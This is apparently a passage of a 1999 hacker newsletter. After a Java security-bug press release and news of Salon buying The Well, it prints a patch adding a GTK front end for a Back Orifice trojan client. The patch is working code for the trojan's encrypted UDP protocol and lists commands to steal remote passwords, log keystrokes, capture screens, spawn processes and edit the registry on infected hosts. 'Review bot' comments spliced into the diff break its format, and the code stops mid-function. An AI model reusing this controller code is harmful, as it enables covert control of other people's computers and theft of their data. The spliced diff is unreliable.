       Date: Mon, 5 Apr 1999 11:13:16 -0700
       From: d3l1r1um@gothlet.net
       To: BUGTRAQ@netspace.org
       Subject: Re: Security Hole in Java 2 (and JDK 1.1.x)
       
       The following is the URL for a press release Sun issued about this:
       
       http://java.sun.com/pr/1999/03/pr990329-01.html
       
       It says the fix is in the works and will be available shortly, and
       will be implemented in the next release(s) of the software (due in
       April).
       
       FYI.
       d3l1r1um.
       
        
       SUN SET TO DELIVER SOFTWARE FIX FOR JAVA(TM) DEVELOPMENT KIT SECURITY BUG

       PALO ALTO, Calif. -- March 26, 1999 -- Sun Microsystems, Inc. today
       announced it has created a fix to a newly discovered implementation bug
       in the Java(TM) Development Kit (JDK(TM)) that affects both JDK 1.1.x and
       the Java 2 platform. The bug poses a potential security risk by allowing
       an untrusted applet to execute unverified code under certain
       circumstances. There are no reports of any attacks based on this bug.

       After being briefed on the bug, Sun created and tested a fix. Releases of
       the patch for all Java 1.1.x platforms and the Java 2 platform are
       imminent. The fix will also be available as a part of JDK 1.1.8 and
       Java 2, v 1.2.1, both scheduled for release in April.

       The bug was discovered by a German graduate student as part of a research
       project and was reported to Sun on March 11, 1999 by Ed Felten, who heads
       the Princeton University Secure Internet Programming Lab.

       "It is important to keep in mind that this is an implementation bug and
       not a flaw in the basic Java platform security model or architecture,"
       said Jon Kannegaard, Vice President and General Manager, Java Platform at
       Sun Microsystems Java Software. "We invite scrutiny from the Internet
       community and publish our source code so that the community will be able
       to analyze our security implementations and give us valuable feedback on
       the architecture and our implementation. We firmly believe that this is
       the best way to evolve the Java platform security model in this spirit of
       openness."

       Kannegaard continued, "Sun takes every security-related implementation
       flaw in Java code very seriously and we thank the Princeton team for their
       contribution to the Java platform."

       For more information, please see http://java.sun.com/sfaq.

       
       @HWA             
  
  39.0 Salon buys The Well
       ~~~~~~~~~~~~~~~~~~~
       
       Salon Buys The Well
       Wired News Report 
       
       9:10 a.m.  7.Apr.99.PDT
       Internet magazine Salon has acquired The Well, one of the Net's oldest 
       and most respected online communities. 
       
       The surprise move, announced Tuesday, gives Salon a dose of new credibility
       by tying it directly into a members-only community of scores of artists,
       writers, thinkers, scientists, programmers, and visionaries. 
       
       Salon said the company intends to operate the Sausalito, California company 
       as a separate business. Terms of the deal were not disclosed. 
       
       Well executive director Gail Williams said the deal does not include Well
       Engaged Discussions Server, which remains a separate business owned by
       former Well parent Rosewood Stone Group. That proprietary software allows
       Picospan, the Well's underlying discussion thread software, to be
       viewable on the Web. 
       
       "The Well will provide Salon with new revenue sources, in addition to our 
       advertising, e-commerce, and syndication business," said Salon president
       and publisher Michael O'Donnell in a statement. 
       
       Logic would dictate that Well Engaged would likely replace the clunky software 
       platform underlying TableTalk, Salon's existing discussion forum area.
       But Salon spokesperson Dayna Macy flatly denies this will occur. 
       
       Still, the deal is really about tapping the credibility of a Net institution. 
       
       "The main thing about The Well is not the Web interface, it's the old-fashioned
       text interface," said David Gans, who has been a member of The
       Well since 1986. 
       
       "I hope that they don't do anything to make it harder for us old guard to use that." 
       
       Gans said that many members of Salon's staff, including vice president and senior
       editor Scott Rosenberg, and author and reporter Andrew Leonard, are longtime Wellheads. 
       
       "They are not the kind of people who are going to come in and make lots of changes
       just because they can." 
       
       Gans said that many Well members were dissatisfied with the service's current owner,
       Bruce Katz, and would likely embrace the new parent. He said that Well CEO Katz had 
       been trying to sell The Well for years, but had been asking for too much money. 
       
       "If we are going to be bought by someone, Salon seems as good as anyone to do it." 
       
       Other Wellheads seemed pleased, and a discussion raged on a topic in one of the service's
       conferences. 
       
       "I think it could be very promising," said Reva Basch, a Wellhead since 1988. 
       
       "One of the big questions in my mind is where are the deep pockets? But culturally and
       conceptually it could be really interesting," said Basch. 
       
       Well director Williams played down persistent rumors that the service's selling price had 
       been overinflated. 
       
       "The popular perception is different than the business perception," Williams said. "How many
       businesses on the Web have as strong an identification and revenue [as the Well has]?" 
       
       "We're dancing on our keyboards over here," Williams said. 
       
       In a prepared statement, Salon's founder described a match made in heaven. 
       
       "The Well's distinctive reputation for thoughtful and intelligent online discussions fits 
       strongly with our network of high-quality content sites and our existing community, Table Talk,"
       said David Talbot. 
       
       The Well has come to be an intellectual safe haven for many of the leading thinkers of the 
       digital age. 
       
       Editor's Note: This story has been corrected. The original report speculated that Well Engaged
       software could possibly replace the Salon discussion area known as Table Talk. In fact, that 
       platform can only replace the software underlying that discussion forum, and not the forum
       itself. Wired News regrets the error. 
       
       @HWA
       
  40.0 Gspot bounix frontend enhancement/replacement
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       diff -ruN bo/Makefile.in bo_gspot/Makefile.in
       --- bo/Makefile.in      Sun Aug  9 14:12:02 1998
       +++ bo_gspot/Makefile.in        Tue Mar 23 17:36:01 1999
       @@ -2,11 +2,14 @@
        LIBS=@LIBS@
        INSTALL=@INSTALL@
        
       -all: bounix
       +prefix=/usr/local/bin
       +
       +all: bounix gspot
        clean:
       -       rm *.o bounix
       +       rm *.o bounix gspot
        install:
       -       $(INSTALL) bounix /usr/local/bin/bounix
       +       $(INSTALL) bounix $(prefix)/bounix
       +       $(INSTALL) gspot $(prefix)/gspot
        distclean:
               rm *.o bounix config.status config.cache config.log config.h Makefile
        .o:
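       Review bot: the new gspot binary is added to the all, clean and install
       targets, but the distclean target in the trailing context still reads
       "rm *.o bounix config.status ..." and should list gspot too, otherwise
       "make distclean" leaves the GTK binary behind. Two smaller points: the
       variable named prefix holds the bin directory (/usr/local/bin) rather than
       the install root, so the conventional split would be prefix=/usr/local
       plus bindir=$(prefix)/bin, which also lets configure's --prefix be
       substituted later; and the rm in clean should be "rm -f", since on an
       already clean tree a missing gspot or bounix makes the target fail.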
       @@ -14,3 +17,6 @@
        
        bounix: bounix.o commands.o help.o
               $(CC) -o bounix bounix.o commands.o help.o $(LIBS)
       +
       +gspot: commands.o gspot.c
       +       $(CC) -g -o gspot gspot.c commands.o $(LIBS) `gtk-config --libs` `gtk-config --cflags`
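       Review bot: the gspot rule compiles gspot.c directly in the link step with
       -g hardcoded and "gtk-config --cflags" placed after the sources and $(LIBS),
       so whatever CFLAGS configure chose are ignored for this target and the
       include flags sit where a reader expects only link flags. Suggest going
       through the existing .o pattern instead: a "gspot.o: gspot.c" rule built
       with $(CC) $(CFLAGS) and "gtk-config --cflags" -c, and "gspot: gspot.o
       commands.o" linked with $(LIBS) and "gtk-config --libs". The rule also
       lists no header prerequisites although gspot.c includes config.h,
       bounix.h and helpstrings.h, so edits to those will not trigger a rebuild.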
       diff -ruN bo/gspot.c bo_gspot/gspot.c
       --- bo/gspot.c  Wed Dec 31 16:00:00 1969
       +++ bo_gspot/gspot.c    Tue Mar 23 16:36:04 1999
       @@ -0,0 +1,891 @@
       +#include "config.h"
       +#include "bounix.h"
       +#include "helpstrings.h"
       +#include <gtk/gtk.h>
       +
       +// Do you have anything to declare?
       +#define PROBE_STR_MAX 30
       +
       +typedef struct {
       +  gchar *Name[1];      //Odd? Yes, but gotta do it for Clist
       +  gchar command[PROBE_STR_MAX + 1];
       +  gchar firstArg[PROBE_STR_MAX + 1];
       +  gchar secondArg[PROBE_STR_MAX + 1];
       +} probeListItem;
       +
       +// Function prototypes
       +void insertProbe (gchar *Name, gchar *bocommand, gchar *arg1, gchar *arg2);
       +void initializeProbes (void);
       +void destroy (GtkWidget *widget, gpointer data);
       +void update_value(GtkWidget *widget, gpointer data);
       +void select_probe (GtkWidget *widget, gint row, gint column, GdkEventButton *event, gpointer data);
       +void gtk_puts (gchar *message);
       +void givehelpcommand(char *arg1);
       +void helpDialog (GtkWidget *widget, gpointer data);
       +gint main( int argc, char *argv[] );
       +
       +// Globals
       +gchar currentProbe[PROBE_STR_MAX + 1];
       +gchar responce[BUFFSIZE + 1];
       +gchar oldhost[ARGSIZE + 1];
       +gchar oldport[6];
       +gint  pidx = 0;
       +probeListItem *probeArray;
       +GtkWidget *returnScreen;
       +GtkWidget *rsScroll;
       +GtkWidget *hostText, *portText, *arg1Text, *arg2Text, *passText;
       +GtkWidget *arg1Label, *arg2Label;
       +// From bounix.c
       +int udpsock;
       +int port = PORT; 
       +int g_lastpongport;
       +unsigned long host;
       +unsigned long g_lastpongip;
       +unsigned long g_packet;
       +static long holdrand = 1L;
       +struct sockaddr_in sockaddr;
       +struct in_addr hostin;
       +char g_password[ARGSIZE + 1];
       +char g_lastdata[BUFFSIZE + 1];
       +char cwd[MAX_PATH + 1];
       +char buff[BUFFSIZE + 1];
       +
       +
       +
       +// Look!  Actual code!
       +
       +void  msrand (unsigned int seed )
       +{
       +  holdrand = (long)seed;
       +}
       +
       +int mrand ( void)
       +{
       +  return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
       +}
       +
       +unsigned int getkey()
       +{
       +  int x, y;
       +  unsigned int z;
       +
       +  y = strlen(g_password);
       +  if (!y)
       +    return 31337;
       +  else {
       +    z = 0;
       +    for (x = 0; x < y; x++)
       +      z+= g_password[x];
       +
       +    for (x = 0; x < y; x++)
       +      {
       +        if (x%2)
       +          z-= g_password[x] * (y-x+1);
       +        else
       +          z+= g_password[x] * (y-x+1);
       +        z = z%RAND_MAX;
       +      } 
       +    z = (z * y)%RAND_MAX;
       +    return z;
       +  }
       +} 
       +
       +void BOcrypt(unsigned char *buff, int len)
       +{
       +  int y;
       +
       +  if (!len)
       +    return;
       +
       +  msrand(getkey());
       +  for (y = 0; y < len; y++)
       +    buff[y] = buff[y] ^ (mrand()%256);
       +}
       +
       +/*
       + *                       I/O socket functions  
       + */
       +
       +int getpong(int sock)           /* loops through with select, returns 0 on correct ping response */
       +{                               /* and 1 on a timeout or select error. */
       +  struct sockaddr_in host;
       +  char buff[BUFFSIZE];
       +  int hostsize, x, sel;
       +  unsigned long *pdw;
       +  unsigned char *ptr;
       +  unsigned long packetsize;
       +  unsigned char type;
       +  fd_set fds;
       +  struct timeval tv;
       +
       +  FD_ZERO(&fds);
       +  FD_SET(sock, &fds);
       +  tv.tv_sec = 0;
       +  tv.tv_usec = 0;
       +  hostsize = sizeof(host);
       +  
       +  while ( (sel = select(sock+1, &fds, NULL, NULL, &tv)) > 0)
       +    {
       +      tv.tv_sec=0;
       +      tv.tv_usec=0;
       +
       +      if ( (x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&host, &hostsize)) <= 0 ) {
       +       return(1);
       +      }
       +
       +      BOcrypt(buff, x);
       +      
       +      if ( strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0) 
       +       {
       +         sprintf(responce, "------- Garbage packet recieved from %s port %d -------\n",
       +                inet_ntoa(host.sin_addr),
       +                (int)ntohs(host.sin_port) );
       +         gtk_puts(responce);
       +         continue;
       +       }
       +      pdw = (unsigned long *)buff;
       +      pdw+=2;
       +      packetsize = __EL_LONG(*pdw);
       +      pdw+=2;
       +      ptr = (unsigned char *)pdw;
       +      type = *ptr++;
       +      
       +      if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET ) && 
       +         (type == TYPE_PING))
       +       {
       +         sprintf(responce, "---- Pong received from %s port %d ---\n", 
       +                inet_ntoa(host.sin_addr),
       +                (int)ntohs(host.sin_port) );
       +         gtk_puts(responce);
       +         gtk_puts(ptr);
       +         sprintf(responce, "---------- End of data ----------------------\n");
       +         gtk_puts(responce);
       +         g_lastpongip = host.sin_addr.s_addr;
       +         g_lastpongport = (int)ntohs(host.sin_port);
       +         return(0);
       +       } else {
       +         sprintf(responce, "---- Non pong response from %s port %d ---\n", 
       +                inet_ntoa(host.sin_addr),
       +                (int)ntohs(host.sin_port) );
       +         gtk_puts(responce);
       +         gtk_puts(ptr);
       +         sprintf(responce, "---------- End of data ---------------------\n");
       +         gtk_puts(responce);
       +         continue;
       +       }
       +    }
       +  if (sel < 0)
       +    perror("select");
       +  
       +  return(1);
       +}
       +
       +int getinput(int sock)
       +{
       +  struct sockaddr_in host;
       +  char buff[BUFFSIZE];
       +  int hostsize, x, sel;
       +  unsigned long *pdw;
       +  unsigned char *ptr;
       +  unsigned long packetsize;
       +  unsigned long oldestpack, lastpacket, packetid, p;
       +  unsigned char type;
       +  struct timeval tv;
       +  fd_set fds;
       +
       +  FD_ZERO(&fds);
       +  FD_SET(sock, &fds);
       +  tv.tv_sec = 10;
       +  tv.tv_usec = 0;
       +  hostsize = sizeof(host);
       +  
       +  while( (sel = select(sock+1, &fds, NULL, NULL, &tv)) > 0 )
       +    {
       +      tv.tv_sec = 10;        /* check, does select modify tv? */
       +      tv.tv_usec = 0;
       +
       +      if ( (x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&host,
       +                        &hostsize)) <= 0)
       +       continue;           /* this still shouldnt happen */
       +      
       +      BOcrypt(buff, x);
       +      if ( strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0) 
       +       continue;                   /* this packet isnt for us, pass off */
       +      
       +      pdw = (unsigned long *)buff;    /* parse out the packet */ 
       +      pdw+=2;
       +      packetsize = *pdw++;
       +      packetsize = __EL_LONG(packetsize);
       +      packetid = *pdw++;
       +      packetid = __EL_LONG(packetid);
       +      ptr = (unsigned char *)pdw;
       +      type = *ptr++;
       +       
       +      /* this is a singular packet */
       +      if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET ) )
       +       {
       +         sprintf(responce, "---- Packet received from %s port %d -----\n",
       +                inet_ntoa(host.sin_addr),
       +                (int)ntohs(host.sin_port) );
       +         gtk_puts(responce);
       +         gtk_puts(ptr);
       +         sprintf(responce, "---------- End of data ---------------------\n");
       +         gtk_puts(responce);
       +         return 0;                                         /* success */
       +       }
       +      
       +      /* first packet in a set of packets */
       +      if (!(type & CONTINUED_PACKET))
       +       {
       +         oldestpack = packetid;
       +         sprintf(responce, "---- Packet received from %s port %d -----\n",
       +                inet_ntoa(host.sin_addr),
       +                (int)ntohs(host.sin_port) );
       +         gtk_puts(responce);
       +       }
       +
       +       if(type & CONTINUED_PACKET)             /* if we're here, i believe this will always be true */
       +        {
       +                                              /* if packetid = lastpacket+1 (normal), this doesnt run */
       +
       +          /* This code is B00l Shit. It's borken big time.
       +          for(p=lastpacket; packetid > lastpacket+1; p++)
       +            printf("Packet #%d in this collection is MIA\n", (int)(p-oldestpack));
       +          */
       +          lastpacket = packetid;
       +        }
       +
       +       gtk_puts(ptr);
       +       
       +       /* last packet in a set of packets */
       +       if (!(type & PARTIAL_PACKET))
       +        {
       +          sprintf(responce, "---------- End of data ---------------------\n");
       +          gtk_puts(responce);
       +          return 0;                                         /* success */
       +        }
       +    }
       +  
       +                                                             /* determine why we broke out of the loop */
       +  if (sel == 0) {
       +    sprintf(responce, "Timeout on wait, host may not be reachable, or no server installed\n");
       +    gtk_puts(responce);
       +  }
       +  else if (sel < 0)
       +    perror("select");
       +  
       +  return(1);                                                 /* error */
       +}
       +
       +
       +int sendping(unsigned long dest, int port, int sock)
       +{
       +  unsigned char *ptr;
       +  unsigned long *pdw;
       +  unsigned long size;
       +  struct sockaddr_in host;
       +  char buff[BUFFSIZE];
       +  int i;
       +  fd_set fdset;
       +  struct timeval tv;
       +
       +  size = MAGICSTRINGLEN + (sizeof(unsigned long)*2) + 2;
       +  strcpy(buff, MAGICSTRING);
       +  pdw = (unsigned long *)(buff + MAGICSTRINGLEN);
       +  *pdw++ = __EL_LONG(size);
       +  *pdw++ = __EL_LONG((unsigned long)-1);
       +  ptr = (unsigned char *)pdw;
       +  *ptr++ = TYPE_PING;
       +  *ptr = 0;
       +  
       +  BOcrypt(buff, (int)size);
       +  
       +  host.sin_family = AF_INET;
       +  host.sin_port = htons((u_short)port);
       +  host.sin_addr.s_addr = dest;
       +  
       +  FD_ZERO(&fdset);
       +  FD_SET(sock, &fdset);
       +  tv.tv_sec = 10;
       +  tv.tv_usec = 0;
       +
       +  i = select(sock+1, NULL, &fdset, NULL, &tv);
       +  if (i == 0)
       +    {
       +      sprintf(responce, "Timeout waiting to send to socket\n");
       +      gtk_puts(responce);
       +      return(1);
       +    } else if (i < 0) {
       +      perror("select: ");
       +      return(1);
       +    }
       +
       +  if ( (sendto(sock, buff, size, 0, (struct sockaddr *)&host, sizeof(host))) != size )
       +    {
       +      perror("sendto: ");
       +      return(1);
       +    }
       +
       +  return 0;
       +}
       +
       +int sendpacket(unsigned char type, const char *str1, const char *str2, unsigned long dest, int port, int sock)
       +{
       +  unsigned char *ptr;
       +  unsigned long *pdw;
       +  unsigned long size;
       +  struct sockaddr_in host;
       +  char buff[BUFFSIZE];
       +  
       +  if (dest == 0)
       +    {
       +      gtk_puts("Set a target host with the 'host' command.  (Type 'help' for assistance)");
       +      return 1;
       +    }
       +  /*               4    4   1    ?        ?      1 
       +   * -----------------------------------------------
       +   * |MAGICSTRING|size|pakt|t|arg1... |arg2... |crc|
       +   * |           |    |num | |        |        |   |
       +   * -----------------------------------------------
       +   */
       +  size = MAGICSTRINGLEN + (sizeof(long)*2) + 3 + strlen(str1) + strlen(str2);
       +  strcpy(buff, MAGICSTRING);
       +  pdw = (unsigned long *)(buff + MAGICSTRINGLEN);
       +  *pdw++ = __EL_LONG(size);
       +  *pdw++ = __EL_LONG(g_packet);
       +  g_packet++;
       +  ptr = (unsigned char *)pdw;
       +  *ptr++ = type;
       +  strcpy(ptr, str1);
       +  ptr += strlen(str1) + 1;
       +  strcpy(ptr, str2);
       +  
       +  BOcrypt(buff, (int)size);
       + 
       +  host.sin_family = AF_INET;
       +  host.sin_port = htons((u_short)port);
       +  host.sin_addr.s_addr = dest;
       +
       +  if ( (sendto(sock, buff, size, 0, (struct sockaddr *)&host, sizeof(host))) != size)
       +     {
       +       perror("sendto: ");
       +       return(1);
       +     }
       +  return 0;
       +}
       +
       +
       +/************************** MISC FUNCTIONS **************************/
       +
       +void fixfilename(char *buff, const char *cwd, const char *path)
       +{
       +  if (path[0] == '\\')
       +    {
       +      strncpy(buff, cwd, 2);
       +      strncpy(buff+3, path, strlen(path)+1);
       +    } else if (strncmp(path+1, ":\\", 2) == 0){
       +      strcpy(buff, path);
       +    } else {
       +      sprintf(buff, "%s%s", cwd, path);
       +    }
       +}
       +
       +void execute(GtkWidget *widget, gpointer data)
       +{
       +  if ( host == 0 ||    // We don't have a host?  Must be the first time...
       +       (strcmp(oldhost, gtk_entry_get_text(GTK_ENTRY(hostText))) ||
       +       strcmp(oldport, gtk_entry_get_text(GTK_ENTRY(portText))) ) )    // The hostname or port was changed
       +    {
       +      executecommand("HOST", gtk_entry_get_text(GTK_ENTRY(hostText)), 
       +                    gtk_entry_get_text(GTK_ENTRY(portText)));
       +      if ( host == 0 )
       +       {
       +         gtk_puts("Resolver said: \"Eat me\"\n  I think you should check your hostname/port.");
       +         gtk_entry_set_text(GTK_ENTRY(hostText), oldhost);
       +         gtk_entry_set_text(GTK_ENTRY(portText), oldport);
       +         return;
       +       }
       +      //We've a host now.
       +      strcpy(oldhost, gtk_entry_get_text(GTK_ENTRY(hostText)) );
       +      strcpy(oldport, gtk_entry_get_text(GTK_ENTRY(portText)) );
       +    }
       +  if (currentProbe[0] == 0)
       +    {
       +      gtk_puts("Please click on one of the commands.\n  I know it looks like ping is selected, but it isn't.");
       +    }
       +  if (executecommand(currentProbe, 
       +                    gtk_entry_get_text(GTK_ENTRY(arg1Text)),
       +                    gtk_entry_get_text(GTK_ENTRY(arg2Text)) )) 
       +    {
       +      sprintf(responce, "Command Failed\n");
       +      gtk_puts(responce);
       +    }
       +}
       +
       +
       +
       +
       +//-----------------------------------------------
       +//   GKT code below 
       +//-----------------------------------------------
       +
       +
       +
       +void insertProbe (gchar *Name, gchar *bocommand, gchar *arg1, gchar *arg2) 
       +{
       +  if (!probeArray) 
       +    {
       +      probeArray = malloc(sizeof(probeListItem));
       +    }
       +  else
       +    {
       +      probeArray = realloc(probeArray, (sizeof(probeListItem) * (pidx+1)) );
       +    }
       +  probeArray[pidx].Name[0] = malloc(sizeof(gchar) * strlen(Name) + 1);
       +  strcpy(probeArray[pidx].Name[0], Name);
       +  strcpy(probeArray[pidx].command, bocommand);
       +  strcpy(probeArray[pidx].firstArg, arg1);
       +  strcpy(probeArray[pidx].secondArg, arg2);
       +  pidx++;
       +
       +}
       +
       +void initializeProbes (void)
       +{
       +  // I've taken a few out, they aren't neccessary with a GUI
       +  //  insertProbe("HOST", "", "");
       +  //  insertProbe("QUIT", "", "");
       +  //  insertProbe("PASSWD", "", "");
       +  // BO commands
       +  insertProbe("Ping", "PING", "Unused:", "Unused:");
       +  insertProbe("Ping List", "PINGLIST", "File Name:", "Unused:");
       +  insertProbe("Sweep subnet", "SWEEP", "Subnet:", "Unused:");
       +  insertProbe("Sweep List", "SWEEPLIST", "File Name:", "Unused:");
       +  // File operations
       +  insertProbe("List dir", "DIR", "File pattern:", "Unused:");
       +  insertProbe("Find file", "FIND", "File pattern:", "Start in:");
       +  insertProbe("View file", "VIEW", "File name:", "Unused:");
       +  insertProbe("Delete file", "DEL", "File:", "Unused:");
       +  insertProbe("Copy file", "COPY", "Source filename:", "Destination:");
       +  insertProbe("Rename file", "REN", "File name:", "Destination:");
       +  insertProbe("Compress file", "FREEZE", "Freeze file:", "Destination:");
       +  insertProbe("Uncompress file", "MELT", "Frozen file:", "Destination:");
       +  // Dir operations
       +  insertProbe("Change dir", "CD", "New directory:", "Unused:");
       +  insertProbe("Make directory", "MD", "New dir:", "Unused:");
       +  insertProbe("Remove directory", "RD", "Directory:", "Unused:");
       +  //  insertProbe("Download file", "GET", "Remote filename:", "Local filename:");    Apparently these two
       +  //  insertProbe("Upload file", "PUT", "Local filename:", "Remote filename:");      weren't implemented
       +  // System operations
       +  //  insertProbe("Open Shell", "SHELL", "Unused:", "Unused:");                      Also not implemented
       +  //  insertProbe("Get status", "STATUS", "Unused:", "Unused:");                     Status is useless to me
       +  insertProbe("Get system info", "INFO", "Unused:", "Unused:");
       +  insertProbe("Get remote passwords", "PASSES", "Unused:", "Unused:");
       +  insertProbe("Create system dialog", "DIALOG", "Dialog text:", "Title text:");
       +  insertProbe("Keylog", "KEYLOG", "Log File: (or stop)", "Unused:");
       +  insertProbe("List processes", "PROCLIST", "Unused:", "Unused:");
       +  insertProbe("Kill process", "PROCKILL", "Process ID:", "Unused:");
       +  insertProbe("Start process", "PROCSPAWN", "Commandline:", "Unused:");
       +  insertProbe("Lockup system", "LOCKUP", "Unused:", "Unused:");
       +  insertProbe("Reboot system", "REBOOT", "Unused:", "Unused:");
       +  // Network stuff
       +  insertProbe("Resolve hostname", "RESOLVE", "Hostname:", "Unused:");
       +  insertProbe("List IP redirects", "REDIRLIST", "Unused:", "Unused:");
       +  insertProbe("Delete IP redirect", "REDIRDEL", "Redir Number:", "Unused:");
       +  insertProbe("Add IP redirect", "REDIRADD", "Input Port:", "Output IP:Port,UDP:");
       +  insertProbe("List console apps", "APPLIST", "Unused:", "Unused:");
       +  insertProbe("Remove console app", "APPDEL", "App ID:", "Unused:");
       +  insertProbe("Add console app", "APPADD", "Program:", "Port:");
       +  insertProbe("List available resources", "NETVIEW", "Unused:", "Unused:");
       +  insertProbe("List connected resources", "NETLIST", "Unused:", "Unused:");
       +  insertProbe("Disconnect resource", "NETDISCONNECT", "Resource:", "Unused:");
       +  insertProbe("Connect to resource", "NETCONNECT", "Resource:", "Password:");
       +  insertProbe("List shares", "SHARELIST", "Unused:", "Unused:");
       +  insertProbe("Delete shares", "SHAREDEL", "Share name:", "Unused:");
       +  insertProbe("Add shares", "SHAREADD", "Share name:", "Local dir,Password,remark:");
       +  insertProbe("Stop HTTP server", "HTTPOFF", "Unused:", "Unused:");
       +  insertProbe("Start HTTP server", "HTTPON", "Port:", "Root:");
       +  insertProbe("Send file via TCP", "TCPSEND", "File name:", "Target IP:Port");
       +  insertProbe("Recieve file via TCP", "TCPRECV", "File name:", "Target IP:Port");
       +  // Multimedia stuff
       +  insertProbe("List MM capture devices", "LISTCAPS", "Unused:", "Unused:");
       +  insertProbe("Capture bitmap", "CAPSCREEN", "File name:", "Unused:");
       +  insertProbe("Capture frame from MM", "CAPFRAME", "File name:", "Device,Width,Height,Bits:");
       +  insertProbe("Capture AVI", "CAPAVI", "File name:", "Seconds,Device,Width,Height,Bits:");
       +  insertProbe("Play wav file", "SOUND", "File name;", "Unused:");
       +  // Registry
       +  insertProbe("List registry subkeys", "REGLISTKEYS", "Keyname:", "Unused:");
       +  insertProbe("List registry values", "REGLISTVALS", "Keyname:", "Unused:");
       +  insertProbe("Delete registry key", "REGDELKEY", "Keyname:", "Unused:");
       +  insertProbe("Make registry key", "REGMAKEKEY", "Keyname:", "Unused:");
       +  insertProbe("Delete registry value", "REGDELVAL", "Value name:", "Unused:");
       +  insertProbe("Set registry value", "REGSETVAL", "Value name:", "Type,Value:");
       +  // Plugins
       +  insertProbe("List plugins", "PLUGINLIST", "Unused:", "Unused:");
       +  insertProbe("Stop plugin", "PLUGINKILL", "Plugin ID:", "Unused:");
       +  insertProbe("Execute plugin", "PLUGINEXEC", "DLL name:Plugin name:", "Plugin args");
       +  
       +  probeArray = realloc(probeArray, sizeof(probeListItem) * (pidx+1) );
       +}
       +
       +void destroy (GtkWidget *widget, gpointer data)
       +{
       +  if(probeArray) {
       +    pidx = 0;
       +    while (  probeArray[pidx].Name[0] != NULL ) {
       +      free(probeArray[pidx].Name[0]);
       +      pidx++;
       +    }
       +    free(probeArray);
       +    probeArray = NULL;
       +  }
       +  close(udpsock);
       +  gtk_main_quit ();
       +}
       +
       +
       +void update_value(GtkWidget *widget, gpointer data)
       +{
       +  // Right now, passText is the only widget that calls us.
       +  //if ( strcasecmp("passText", gtk_widget_get_name( GTK_WIDGET(widget) )) == 0 )
       +  strcpy(g_password, gtk_entry_get_text(GTK_ENTRY(widget)));
       +}
       +
       +
       +void select_probe (GtkWidget *widget, gint row, gint column, GdkEventButton *event, gpointer data)
       +{
       +  strcpy(currentProbe, probeArray[row].command);
       +  gtk_label_set(GTK_LABEL(arg1Label), probeArray[row].firstArg);
       +  gtk_label_set(GTK_LABEL(arg2Label), probeArray[row].secondArg);
       +}
       +
       +void gtk_puts (gchar *message)
       +{
       +  gtk_text_insert( GTK_TEXT(returnScreen),NULL,NULL,NULL,message,-1);
       +  if(message[strlen(message)-1] != '\n')
       +  gtk_text_insert( GTK_TEXT(returnScreen),NULL,NULL,NULL,"\n",-1);    
       +}
       +
       +void givehelpcommand(char *arg1)
       +{
       +  helpDialog(NULL, arg1);
       +}
       +
       +void helpDialog (GtkWidget *widget, gpointer data)
       +{
       +  GtkWidget *helpWindow;
       +  GtkWidget *button;
       +  GtkWidget *label;
       +  char labelTemp[10];
       +
       +  helpWindow = gtk_dialog_new ();
       +  gtk_container_border_width (GTK_CONTAINER (helpWindow), 10);
       +  
       +  button = gtk_button_new_with_label("OK");
       +  gtk_signal_connect_object (GTK_OBJECT (button), "clicked",
       +                            GTK_SIGNAL_FUNC (gtk_widget_destroy), GTK_OBJECT (helpWindow));
       +  gtk_box_pack_start (GTK_BOX (GTK_DIALOG (helpWindow)->action_area), button,
       +                     TRUE, TRUE, 0);
       +  gtk_widget_show (button);
       +  
       +  if (strlen((char *) data) == 0)                              label = gtk_label_new("Select an item first");
       +  else if (strcasecmp((char *) data, "HOST") == 0)             label = gtk_label_new(hosthelp);
       +  else if (strcasecmp((char *) data, "QUIT") == 0)             label = gtk_label_new(quithelp);
       +  else if (strcasecmp((char *) data, "PING") == 0)             label = gtk_label_new(pinghelp);
       +  else if (strcasecmp((char *) data, "PINGLIST") == 0)         label = gtk_label_new(pinglisthelp);
       +  else if (strcasecmp((char *) data, "SWEEP") == 0)            label = gtk_label_new(sweephelp);
       +  else if (strcasecmp((char *) data, "SWEEPLIST") == 0)                label = gtk_label_new(sweeplisthelp);
       +  else if (strcasecmp((char *) data, "SHELL") == 0)            label = gtk_label_new(shellhelp);
       +  else if (strcasecmp((char *) data, "STATUS") == 0)           label = gtk_label_new(statushelp);
       +  else if (strcasecmp((char *) data, "PASSWD") == 0)           label = gtk_label_new(passwdhelp);
       +  else if (strcasecmp((char *) data, "DIR") == 0)              label = gtk_label_new(dirhelp);
       +  else if (strcasecmp((char *) data, "CD") == 0)               label = gtk_label_new(cdhelp);
       +  else if (strcasecmp((char *) data, "DEL") == 0)              label = gtk_label_new(delhelp);
       +  else if (strcasecmp((char *) data, "GET") == 0)              label = gtk_label_new(gethelp);
       +  else if (strcasecmp((char *) data, "PUT") == 0)              label = gtk_label_new(puthelp);
       +  else if (strcasecmp((char *) data, "COPY") == 0)             label = gtk_label_new(copyhelp);
       +  else if (strcasecmp((char *) data, "FIND") == 0)             label = gtk_label_new(findhelp);
       +  else if (strcasecmp((char *) data, "FREEZE") == 0)           label = gtk_label_new(freezehelp);
       +  else if (strcasecmp((char *) data, "MELT") == 0)             label = gtk_label_new(melthelp);
       +  else if (strcasecmp((char *) data, "VIEW") == 0)             label = gtk_label_new(viewhelp);
       +  else if (strcasecmp((char *) data, "REN") == 0)              label = gtk_label_new(renhelp);
       +  else if (strcasecmp((char *) data, "MD") == 0)               label = gtk_label_new(mdhelp);
       +  else if (strcasecmp((char *) data, "RD") == 0)               label = gtk_label_new(rdhelp);
       +  else if (strcasecmp((char *) data, "INFO") == 0)             label = gtk_label_new(infohelp);
       +  else if (strcasecmp((char *) data, "PASSES") == 0)           label = gtk_label_new(passeshelp);
       +  else if (strcasecmp((char *) data, "DIALOG") == 0)           label = gtk_label_new(dialoghelp);
       +  else if (strcasecmp((char *) data, "KEYLOG") == 0)           label = gtk_label_new(keyloghelp);
       +  else if (strcasecmp((char *) data, "REBOOT") == 0)           label = gtk_label_new(reboothelp);
       +  else if (strcasecmp((char *) data, "NETVIEW") == 0)          label = gtk_label_new(netviewhelp);
